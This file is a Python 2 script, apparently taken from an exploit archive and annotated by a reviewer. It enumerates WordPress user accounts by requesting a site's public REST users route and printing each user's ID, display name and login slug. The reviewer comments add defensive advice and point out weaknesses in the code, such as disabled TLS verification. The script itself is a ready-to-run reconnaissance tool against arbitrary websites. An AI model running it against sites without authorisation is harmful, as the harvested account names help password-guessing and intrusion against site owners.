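#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Exploit Title : WordPress < 5.3 - User Disclosure
#                 (the page heading reads "WordPress 5.3 - User Disclosure")
# Exploit Author: SajjadBnd
# email : blackwolf@post.com
# Date: 2019-11-17
# Software Link: https://wordpress.org/download/
# version : wp < 5.3
# tested on : Ubuntu 18.04 / python 2.7
# CVE: N/A
# File: wpuser.txt (the page printed this listing twice: inline and as the attachment)
#
# NOTE(review): all this script does is send one unauthenticated GET to
# <site>/wp-json/wp/v2/users/ and print the "id", "name" and "slug" fields of
# every object in the JSON reply. Nothing in the listing checks the WordPress
# version, so the "< 5.3" bound above is the author's statement and is not
# verified by the code.
#
# NOTE(review): for defenders -- the script labels the slug as the user name,
# so a populated reply from this route should be treated as account-name
# disclosure. Where a public author listing is not needed, require
# authentication for the REST users route; keep login endpoints rate-limited
# and protected by strong credentials/MFA; and look for requests to the path
# above in the web server access logs.
#
# NOTE(review): Python 2 only as written (raw_input, reload(sys),
# sys.setdefaultencoding); kept that way because 2.7 is what the author tested.

import requests
import os
import re
import json
import sys
import urllib3


def clear():
    """Clear the terminal with the platform's own command."""
    # Both command strings are constants; no user input reaches the shell.
    os.system('cls' if os.name == 'nt' else 'clear')


def Banner():
    """Print the tool banner."""
    print('''
- WordPress < 5.3 - User Enumeration
- SajjadBnd
''')


def Desc():
    """Prompt for a site URL, request its REST users route and print the reply.

    The URL is read from stdin and "/wp-json/wp/v2/users/" is appended to it.
    If requests rejects the URL for lacking a scheme, "http://" is prepended
    and the request is repeated. Any other request failure, or a body that is
    not JSON, is reported and ends the process with status 1 instead of an
    unhandled traceback. On a JSON reply control passes to data(), which
    always exits the process.
    """
    url = raw_input('[!] Url >> ')
    vuln = url + "/wp-json/wp/v2/users/"
    while True:
        try:
            # NOTE(review): verify=False turns off TLS certificate checking, so
            # the reply is not authenticated and could come from an on-path
            # party. Left as the author wrote it; flagged, not changed.
            # The timeout keeps an unresponsive host from hanging the script.
            r = requests.get(vuln, verify=False, timeout=15)
            content = json.loads(r.text)
        except requests.exceptions.MissingSchema:
            # Must be caught before the broader handlers below: MissingSchema
            # is itself a RequestException.
            vuln = "http://" + vuln
            continue
        except (requests.exceptions.RequestException, ValueError) as err:
            # ValueError covers a body that does not parse as JSON.
            print("[-] Request failed or reply was not JSON: " + str(err))
            sys.exit(1)
        data(content)


def data(content):
    """Print id, name and slug for each user object, then exit the process.

    content is the decoded JSON reply. A list is printed entry by entry and
    the process exits with status 0. Anything else (a REST error reply is a
    JSON object, not a list) is reported and the process exits with status 1;
    the original iterated over it and crashed on the first key.
    """
    if not isinstance(content, list):
        print("[-] Reply is not a user list")
        sys.exit(1)
    for x in content:
        name = x["name"].encode('UTF-8')
        print("======================")
        print("[+] ID : " + str(x["id"]))
        print("[+] Name : " + name)
        print("[+] User : " + x["slug"])
    # The original exited with 1 here, which reports failure to the caller
    # even though the listing was printed.
    sys.exit(0)


if __name__ == '__main__':
    # Suppresses the warning urllib3 emits for the unverified HTTPS request.
    urllib3.disable_warnings()
    # Python 2 idiom: reload(sys) restores setdefaultencoding so that mixing
    # byte strings and unicode in the print calls does not raise.
    reload(sys)
    sys.setdefaultencoding('UTF8')
    clear()
    Banner()
    Desc()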